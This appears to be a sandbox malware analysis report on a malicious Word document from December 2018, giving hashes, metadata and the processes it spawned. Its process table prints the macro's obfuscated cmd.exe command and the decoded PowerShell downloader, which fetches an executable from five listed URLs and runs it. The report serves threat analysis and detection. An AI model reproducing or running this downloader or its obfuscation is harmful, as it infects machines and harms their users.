File name: | d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0 |
Full analysis: | https://app.any.run/tasks/032e3158-34eb-44cb-b4e8-7ebbac56284a |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 07:04:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 06:23:00 2018, Last Saved Time/Date: Tue Dec 4 06:23:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 43, Security: 0 |
MD5: | 94F8CC67F0979B25B8B129DF872F9822 |
SHA1: | 62C5533F74A3D4F5EC2D224CEA5481BD3D932B30 |
SHA256: | D757B7954BBC570FE19AB1EA593FFFB3B492E69C15232E2329134A1B01BC29E0 |
SSDEEP: | 1536:XeHocn1kp59gxBK85fBt+a9BMlfbuhv0Ivi:Xt41k/W48sShM8i |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 49 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 43 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:04 06:23:00 |
CreateDate: | 2018:12:04 06:23:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | c:\GXYNiHuIXdvR\sRXUolPj\WpptJsd\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if %6 leq 3 echo !5O:~4! |%TMP:~-17,1%ower%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2396 | CmD /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if %6 leq 3 echo !5O:~4! |power%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2456 | C:\Windows\system32\cmd.exe /S /D /c" echo $mwl='Vfs';$isD=new-object Net.WebClient;$oKP='http://byciara.com/0i3BgTG@http://burnbrighter.com/mQ5tBipU@http://chainboy.com/ZE67diCLv@http://aural6.net/yobZPsMLA@http://tecnauto.com/UMTE5JuqX'.Split('@');$CjK='fnz';$Bqz = '504';$sYh='BqR';$DWl=$env:temp+'\'+$Bqz+'.exe';foreach($umn in $oKP){try{$isD.DownloadFile($umn, $DWl);$svO='AbT';If ((Get-Item $DWl).length -ge 80000) {Invoke-Item $DWl;$YJf='QSJ';break;}}catch{}}$CtL='wlP'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C09.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5E2041FDA144453159427A44F1671FF2 | SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$57b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.doc | pgc | |
MD5:65022AF5A51C3BEE12E731C531C02C24 | SHA256:58EF79BD6F8213001F2DD81A5D500D34759AB5B4C2861C922B72DF0792E56606 |